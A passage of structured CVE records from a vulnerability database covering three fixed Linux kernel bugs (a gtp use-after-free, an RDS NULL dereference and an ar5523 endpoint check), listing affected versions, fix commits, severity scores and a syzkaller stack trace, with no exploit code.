"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.162",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: gtp: Fix Use-After-Free in gtp_dellink\n\nSince call_rcu, which is called in the hlist_for_each_entry_rcu traversal\nof gtp_dellink, is not part of the RCU read critical section, it\nis possible that the RCU grace period will pass during the traversal and\nthe key will be free.\n\nTo prevent this, it should be changed to hlist_for_each_entry_safe."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:30.840Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/07b20d0a3dc13fb1adff10b60021a4924498da58"
},
{
"url": "https://git.kernel.org/stable/c/718df1bc226c383dd803397d7f5d95557eb81ac7"
},
{
"url": "https://git.kernel.org/stable/c/0caff3e6390f840666b8dc1ecebf985c2ef3f1dd"
},
{
"url": "https://git.kernel.org/stable/c/2e74b3fd6bf542349758f283676dff3660327c07"
},
{
"url": "https://git.kernel.org/stable/c/25a1c2d4b1fcf938356a9688a96a6456abd44b29"
},
{
"url": "https://git.kernel.org/stable/c/2aacd4de45477582993f8a8abb9505a06426bfb6"
},
{
"url": "https://git.kernel.org/stable/c/cd957d1716ec979d8f5bf38fc659aeb9fdaa2474"
},
{
"url": "https://git.kernel.org/stable/c/f2a904107ee2b647bb7794a1a82b67740d7c8a64"
}
],
"title": "net: gtp: Fix Use-After-Free in gtp_dellink",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27396",
"datePublished": "2024-05-09T16:37:18.867Z",
"dateReserved": "2024-02-25T13:47:42.677Z",
"dateUpdated": "2025-05-04T12:55:30.840Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35902 (GCVE-0-2024-35902)
Vulnerability from cvelistv5
Published
2024-05-19 08:34
Modified
2025-05-04 12:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/rds: fix possible cp null dereference
cp might be null, calling cp->cp_conn would produce null dereference
[Simon Horman adds:]
Analysis:
* cp is a parameter of __rds_rdma_map and is not reassigned.
* The following call-sites pass a NULL cp argument to __rds_rdma_map()
- rds_get_mr()
- rds_get_mr_for_dest
* Prior to the code above, the following assumes that cp may be NULL
(which is indicative, but could itself be unnecessary)
trans_private = rs->rs_transport->get_mr(
sg, nents, rs, &mr->r_key, cp ? cp->cp_conn : NULL,
args->vec.addr, args->vec.bytes,
need_odp ? ODP_ZEROBASED : ODP_NOT_NEEDED);
* The code modified by this patch is guarded by IS_ERR(trans_private),
where trans_private is assigned as per the previous point in this analysis.
The only implementation of get_mr that I could locate is rds_ib_get_mr()
which can return an ERR_PTR if the conn (4th) argument is NULL.
* ret is set to PTR_ERR(trans_private).
rds_ib_get_mr can return ERR_PTR(-ENODEV) if the conn (4th) argument is NULL.
Thus ret may be -ENODEV in which case the code in question will execute.
Conclusion:
* cp may be NULL at the point where this patch adds a check;
this patch does seem to address a possible bug
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 786854141057751bc08eb26f1b02e97c1631c8f4 Version: 997efea2bf3a4adb96c306b9ad6a91442237bf5b Version: 9dfc15a10dfd44f8ff7f27488651cb5be6af83c2 Version: b562ebe21ed9adcf42242797dd6cb75beef12bf0 Version: 998fd719e6d6468b930ac0c44552ea9ff8b07b80 Version: 2b505d05280739ce31d5708da840f42df827cb85 Version: c055fc00c07be1f0df7375ab0036cebd1106ed38 Version: c055fc00c07be1f0df7375ab0036cebd1106ed38 Version: 907761307469adecb02461a14120e9a1812a5fb1 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35902",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T14:09:14.303997Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:18.553Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.670Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d275de8ea7be3a453629fddae41d4156762e814c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bcd46782e2ec3825d10c1552fcb674d491cc09f9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cfb786b03b03c5ff38882bee38525eb9987e4d14"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d49fac38479bfdaec52b3ea274d290c47a294029"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cbaac2e5488ed54833897264a5ffb2a341a9f196"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/92309bed3c5fbe2ccd4c45056efd42edbd06162d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6794090c742008c53b344b35b021d4a3093dc50a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/62fc3357e079a07a22465b9b6ef71bb6ea75ee4b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/rds/rdma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d275de8ea7be3a453629fddae41d4156762e814c",
"status": "affected",
"version": "786854141057751bc08eb26f1b02e97c1631c8f4",
"versionType": "git"
},
{
"lessThan": "bcd46782e2ec3825d10c1552fcb674d491cc09f9",
"status": "affected",
"version": "997efea2bf3a4adb96c306b9ad6a91442237bf5b",
"versionType": "git"
},
{
"lessThan": "cfb786b03b03c5ff38882bee38525eb9987e4d14",
"status": "affected",
"version": "9dfc15a10dfd44f8ff7f27488651cb5be6af83c2",
"versionType": "git"
},
{
"lessThan": "d49fac38479bfdaec52b3ea274d290c47a294029",
"status": "affected",
"version": "b562ebe21ed9adcf42242797dd6cb75beef12bf0",
"versionType": "git"
},
{
"lessThan": "cbaac2e5488ed54833897264a5ffb2a341a9f196",
"status": "affected",
"version": "998fd719e6d6468b930ac0c44552ea9ff8b07b80",
"versionType": "git"
},
{
"lessThan": "92309bed3c5fbe2ccd4c45056efd42edbd06162d",
"status": "affected",
"version": "2b505d05280739ce31d5708da840f42df827cb85",
"versionType": "git"
},
{
"lessThan": "6794090c742008c53b344b35b021d4a3093dc50a",
"status": "affected",
"version": "c055fc00c07be1f0df7375ab0036cebd1106ed38",
"versionType": "git"
},
{
"lessThan": "62fc3357e079a07a22465b9b6ef71bb6ea75ee4b",
"status": "affected",
"version": "c055fc00c07be1f0df7375ab0036cebd1106ed38",
"versionType": "git"
},
{
"status": "affected",
"version": "907761307469adecb02461a14120e9a1812a5fb1",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/rds/rdma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.8"
},
{
"lessThan": "6.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "4.19.310",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "5.4.272",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.213",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.15.152",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "6.1.82",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "6.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.7.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/rds: fix possible cp null dereference\n\ncp might be null, calling cp-\u003ecp_conn would produce null dereference\n\n[Simon Horman adds:]\n\nAnalysis:\n\n* cp is a parameter of __rds_rdma_map and is not reassigned.\n\n* The following call-sites pass a NULL cp argument to __rds_rdma_map()\n\n - rds_get_mr()\n - rds_get_mr_for_dest\n\n* Prior to the code above, the following assumes that cp may be NULL\n (which is indicative, but could itself be unnecessary)\n\n\ttrans_private = rs-\u003ers_transport-\u003eget_mr(\n\t\tsg, nents, rs, \u0026mr-\u003er_key, cp ? cp-\u003ecp_conn : NULL,\n\t\targs-\u003evec.addr, args-\u003evec.bytes,\n\t\tneed_odp ? ODP_ZEROBASED : ODP_NOT_NEEDED);\n\n* The code modified by this patch is guarded by IS_ERR(trans_private),\n where trans_private is assigned as per the previous point in this analysis.\n\n The only implementation of get_mr that I could locate is rds_ib_get_mr()\n which can return an ERR_PTR if the conn (4th) argument is NULL.\n\n* ret is set to PTR_ERR(trans_private).\n rds_ib_get_mr can return ERR_PTR(-ENODEV) if the conn (4th) argument is NULL.\n Thus ret may be -ENODEV in which case the code in question will execute.\n\nConclusion:\n* cp may be NULL at the point where this patch adds a check;\n this patch does seem to address a possible bug"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:02.708Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d275de8ea7be3a453629fddae41d4156762e814c"
},
{
"url": "https://git.kernel.org/stable/c/bcd46782e2ec3825d10c1552fcb674d491cc09f9"
},
{
"url": "https://git.kernel.org/stable/c/cfb786b03b03c5ff38882bee38525eb9987e4d14"
},
{
"url": "https://git.kernel.org/stable/c/d49fac38479bfdaec52b3ea274d290c47a294029"
},
{
"url": "https://git.kernel.org/stable/c/cbaac2e5488ed54833897264a5ffb2a341a9f196"
},
{
"url": "https://git.kernel.org/stable/c/92309bed3c5fbe2ccd4c45056efd42edbd06162d"
},
{
"url": "https://git.kernel.org/stable/c/6794090c742008c53b344b35b021d4a3093dc50a"
},
{
"url": "https://git.kernel.org/stable/c/62fc3357e079a07a22465b9b6ef71bb6ea75ee4b"
}
],
"title": "net/rds: fix possible cp null dereference",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35902",
"datePublished": "2024-05-19T08:34:55.692Z",
"dateReserved": "2024-05-17T13:50:33.114Z",
"dateUpdated": "2025-05-04T12:56:02.708Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38565 (GCVE-0-2024-38565)
Vulnerability from cvelistv5
Published
2024-06-19 13:35
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: ar5523: enable proper endpoint verification
Syzkaller reports [1] hitting a warning about an endpoint in use
not having an expected type to it.
Fix the issue by checking for the existence of all proper
endpoints with their according types intact.
Sadly, this patch has not been tested on real hardware.
[1] Syzkaller report:
------------[ cut here ]------------
usb 1-1: BOGUS urb xfer, pipe 3 != type 1
WARNING: CPU: 0 PID: 3643 at drivers/usb/core/urb.c:504 usb_submit_urb+0xed6/0x1880 drivers/usb/core/urb.c:504
...
Call Trace:
<TASK>
ar5523_cmd+0x41b/0x780 drivers/net/wireless/ath/ar5523/ar5523.c:275
ar5523_cmd_read drivers/net/wireless/ath/ar5523/ar5523.c:302 [inline]
ar5523_host_available drivers/net/wireless/ath/ar5523/ar5523.c:1376 [inline]
ar5523_probe+0x14b0/0x1d10 drivers/net/wireless/ath/ar5523/ar5523.c:1655
usb_probe_interface+0x30f/0x7f0 drivers/usb/core/driver.c:396
call_driver_probe drivers/base/dd.c:560 [inline]
really_probe+0x249/0xb90 drivers/base/dd.c:639
__driver_probe_device+0x1df/0x4d0 drivers/base/dd.c:778
driver_probe_device+0x4c/0x1a0 drivers/base/dd.c:808
__device_attach_driver+0x1d4/0x2e0 drivers/base/dd.c:936
bus_for_each_drv+0x163/0x1e0 drivers/base/bus.c:427
__device_attach+0x1e4/0x530 drivers/base/dd.c:1008
bus_probe_device+0x1e8/0x2a0 drivers/base/bus.c:487
device_add+0xbd9/0x1e90 drivers/base/core.c:3517
usb_set_configuration+0x101d/0x1900 drivers/usb/core/message.c:2170
usb_generic_driver_probe+0xbe/0x100 drivers/usb/core/generic.c:238
usb_probe_device+0xd8/0x2c0 drivers/usb/core/driver.c:293
call_driver_probe drivers/base/dd.c:560 [inline]
really_probe+0x249/0xb90 drivers/base/dd.c:639
__driver_probe_device+0x1df/0x4d0 drivers/base/dd.c:778
driver_probe_device+0x4c/0x1a0 drivers/base/dd.c:808
__device_attach_driver+0x1d4/0x2e0 drivers/base/dd.c:936
bus_for_each_drv+0x163/0x1e0 drivers/base/bus.c:427
__device_attach+0x1e4/0x530 drivers/base/dd.c:1008
bus_probe_device+0x1e8/0x2a0 drivers/base/bus.c:487
device_add+0xbd9/0x1e90 drivers/base/core.c:3517
usb_new_device.cold+0x685/0x10ad drivers/usb/core/hub.c:2573
hub_port_connect drivers/usb/core/hub.c:5353 [inline]
hub_port_connect_change drivers/usb/core/hub.c:5497 [inline]
port_event drivers/usb/core/hub.c:5653 [inline]
hub_event+0x26cb/0x45d0 drivers/usb/core/hub.c:5735
process_one_work+0x9bf/0x1710 kernel/workqueue.c:2289
worker_thread+0x669/0x1090 kernel/workqueue.c:2436
kthread+0x2e8/0x3a0 kernel/kthread.c:376
ret_from_fork+0x1f/0x30 arch/x86/entry/entry_64.S:306
</TASK>
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: b7d572e1871df06a96a1c9591c71c5494ff6b624 Version: b7d572e1871df06a96a1c9591c71c5494ff6b624 Version: b7d572e1871df06a96a1c9591c71c5494ff6b624 Version: b7d572e1871df06a96a1c9591c71c5494ff6b624 Version: b7d572e1871df06a96a1c9591c71c5494ff6b624 Version: b7d572e1871df06a96a1c9591c71c5494ff6b624 Version: b7d572e1871df06a96a1c9591c71c5494ff6b624 Version: b7d572e1871df06a96a1c9591c71c5494ff6b624 Version: b7d572e1871df06a96a1c9591c71c5494ff6b624 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-38565",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-24T15:24:16.719538Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-01T14:41:42.203Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:29.789Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/79ddf5f2020fd593d50f1363bb5131283d74f78f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/68a5a00c5d38978a3f8460c6f182f7beec8688ff"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ee25389df80138907bc9dcdf4a2be2067cde9a81"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b4c24de37a6bb383394a6fef2b85a6db41d426f5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/34f7ebff1b9699e0b89fa58b693bc098c2f5ec72"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b33a81e4ecfb022b028cae37d1c1ce28ac1b359d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/beeed260b92af158592f5e8d2dab65dae45c6f70"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7bbf76c9bb2c58375e183074e44f9712483f0603"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e120b6388d7d88635d67dcae6483f39c37111850"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/ath/ar5523/ar5523.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "79ddf5f2020fd593d50f1363bb5131283d74f78f",
"status": "affected",
"version": "b7d572e1871df06a96a1c9591c71c5494ff6b624",
"versionType": "git"
},
{
"lessThan": "68a5a00c5d38978a3f8460c6f182f7beec8688ff",
"status": "affected",
"version": "b7d572e1871df06a96a1c9591c71c5494ff6b624",
"versionType": "git"
},
{
"lessThan": "ee25389df80138907bc9dcdf4a2be2067cde9a81",
"status": "affected",
"version": "b7d572e1871df06a96a1c9591c71c5494ff6b624",
"versionType": "git"
},
{
"lessThan": "b4c24de37a6bb383394a6fef2b85a6db41d426f5",
"status": "affected",
"version": "b7d572e1871df06a96a1c9591c71c5494ff6b624",
"versionType": "git"
},
{
"lessThan": "34f7ebff1b9699e0b89fa58b693bc098c2f5ec72",
"status": "affected",
"version": "b7d572e1871df06a96a1c9591c71c5494ff6b624",
"versionType": "git"
},
{
"lessThan": "b33a81e4ecfb022b028cae37d1c1ce28ac1b359d",
"status": "affected",
"version": "b7d572e1871df06a96a1c9591c71c5494ff6b624",
"versionType": "git"
},
{
"lessThan": "beeed260b92af158592f5e8d2dab65dae45c6f70",
"status": "affected",
"version": "b7d572e1871df06a96a1c9591c71c5494ff6b624",
"versionType": "git"
},
{
"lessThan": "7bbf76c9bb2c58375e183074e44f9712483f0603",
"status": "affected",
"version": "b7d572e1871df06a96a1c9591c71c5494ff6b624",
"versionType": "git"
},
{
"lessThan": "e120b6388d7d88635d67dcae6483f39c37111850",
"status": "affected",
"version": "b7d572e1871df06a96a1c9591c71c5494ff6b624",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/ath/ar5523/ar5523.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.8"
},
{
"lessThan": "3.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "3.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ar5523: enable proper endpoint verification\n\nSyzkaller reports [1] hitting a warning about an endpoint in use\nnot having an expected type to it.\n\nFix the issue by checking for the existence of all proper\nendpoints with their according types intact.\n\nSadly, this patch has not been tested on real hardware.\n\n[1] Syzkaller report:\n------------[ cut here ]------------\nusb 1-1: BOGUS urb xfer, pipe 3 != type 1\nWARNING: CPU: 0 PID: 3643 at drivers/usb/core/urb.c:504 usb_submit_urb+0xed6/0x1880 drivers/usb/core/urb.c:504\n...\nCall Trace:\n \u003cTASK\u003e\n ar5523_cmd+0x41b/0x780 drivers/net/wireless/ath/ar5523/ar5523.c:275\n ar5523_cmd_read drivers/net/wireless/ath/ar5523/ar5523.c:302 [inline]\n ar5523_host_available drivers/net/wireless/ath/ar5523/ar5523.c:1376 [inline]\n ar5523_probe+0x14b0/0x1d10 drivers/net/wireless/ath/ar5523/ar5523.c:1655\n usb_probe_interface+0x30f/0x7f0 drivers/usb/core/driver.c:396\n call_driver_probe drivers/base/dd.c:560 [inline]\n really_probe+0x249/0xb90 drivers/base/dd.c:639\n __driver_probe_device+0x1df/0x4d0 drivers/base/dd.c:778\n driver_probe_device+0x4c/0x1a0 drivers/base/dd.c:808\n __device_attach_driver+0x1d4/0x2e0 drivers/base/dd.c:936\n bus_for_each_drv+0x163/0x1e0 drivers/base/bus.c:427\n __device_attach+0x1e4/0x530 drivers/base/dd.c:1008\n bus_probe_device+0x1e8/0x2a0 drivers/base/bus.c:487\n device_add+0xbd9/0x1e90 drivers/base/core.c:3517\n usb_set_configuration+0x101d/0x1900 drivers/usb/core/message.c:2170\n usb_generic_driver_probe+0xbe/0x100 drivers/usb/core/generic.c:238\n usb_probe_device+0xd8/0x2c0 drivers/usb/core/driver.c:293\n call_driver_probe drivers/base/dd.c:560 [inline]\n really_probe+0x249/0xb90 drivers/base/dd.c:639\n __driver_probe_device+0x1df/0x4d0 drivers/base/dd.c:778\n driver_probe_device+0x4c/0x1a0 drivers/base/dd.c:808\n __device_attach_driver+0x1d4/0x2e0 drivers/base/dd.c:936\n bus_for_each_drv+0x163/0x1e0 drivers/base/bus.c:427\n __device_attach+0x1e4/0x530 drivers/base/dd.c:1008\n bus_probe_device+0x1e8/0x2a0 drivers/base/bus.c:487\n device_add+0xbd9/0x1e90 drivers/base/core.c:3517\n usb_new_device.cold+0x685/0x10ad drivers/usb/core/hub.c:2573\n hub_port_connect drivers/usb/core/hub.c:5353 [inline]\n hub_port_connect_change drivers/usb/core/hub.c:5497 [inline]\n port_event drivers/usb/core/hub.c:5653 [inline]\n hub_event+0x26cb/0x45d0 drivers/usb/core/hub.c:5735\n process_one_work+0x9bf/0x1710 kernel/workqueue.c:2289\n worker_thread+0x669/0x1090 kernel/workqueue.c:2436\n kthread+0x2e8/0x3a0 kernel/kthread.c:376\n ret_from_fork+0x1f/0x30 arch/x86/entry/entry_64.S:306\n \u003c/TASK\u003e"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:14:13.790Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/79ddf5f2020fd593d50f1363bb5131283d74f78f"
},
{
"url": "https://git.kernel.org/stable/c/68a5a00c5d38978a3f8460c6f182f7beec8688ff"
},
{
"url": "https://git.kernel.org/stable/c/ee25389df80138907bc9dcdf4a2be2067cde9a81"
},
{
"url": "https://git.kernel.org/stable/c/b4c24de37a6bb383394a6fef2b85a6db41d426f5"
},
{
"url": "https://git.kernel.org/stable/c/34f7ebff1b9699e0b89fa58b693bc098c2f5ec72"
},
{
